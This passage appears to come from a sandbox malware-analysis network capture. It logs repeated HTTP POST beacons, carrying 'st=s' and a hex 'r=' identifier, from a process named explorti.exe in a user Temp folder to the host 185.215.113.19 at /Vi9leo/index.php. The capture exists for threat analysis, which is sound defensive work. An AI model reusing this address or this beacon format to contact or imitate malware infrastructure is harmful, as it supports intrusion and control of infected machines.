r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:53:41.202441931 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:53:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.8	49727	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:53:41.314282894 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:53:42.083626986 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:53:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 13:53:42.084727049 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:53:42.359379053 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:53:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.8	49728	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:53:42.470330000 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:53:43.260086060 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:53:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 13:53:43.261219978 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:53:43.504002094 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:53:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.8	49729	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:53:43.627729893 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:53:44.387075901 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:53:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 13:53:44.387986898 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:53:44.632642984 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:53:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.8	49730	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:53:44.751257896 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:53:45.494163990 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:53:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 13:53:45.495017052 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:53:45.741118908 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:53:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.8	49731	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:53:45.867320061 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:53:46.626811981 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:53:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 13:53:46.627948999 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:53:46.883609056 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:53:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.8	49732	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:53:47.001297951 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:53:47.781443119 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:53:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 13:53:47.782283068 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:53:48.026412010 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:53:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.8	49733	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:53:48.142585993 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:53:48.896384001 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:53:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 13:53:48.898267984 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:53:49.146609068 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:53:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.8	49734	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:53:49.271176100 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:53:50.011953115 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:53:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 13:53:50.013050079 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:53:50.256272078 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:53:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.8	49735	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:53:50.376176119 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:53:51.148530006 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:53:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 13:53:51.149372101 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:53:51.531869888 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:53:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.8	49736	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:53:51.642836094 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:53:52.398324013 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:53:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 13:53:52.399173975 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:53:52.645900011 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:53:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.8	49737	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:53:52.767421961 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:53:53.520816088 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:53:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 13:53:53.521770954 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:53:54.026251078 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:53:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Jul 26, 2024 13:53:54.028012037 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:53:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.8	49738	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:53:54.142014980 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:53:54.961924076 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:53:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 13:53:54.964956999 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:53:55.211065054 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:53:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.8	49739	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:53:55.330298901 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
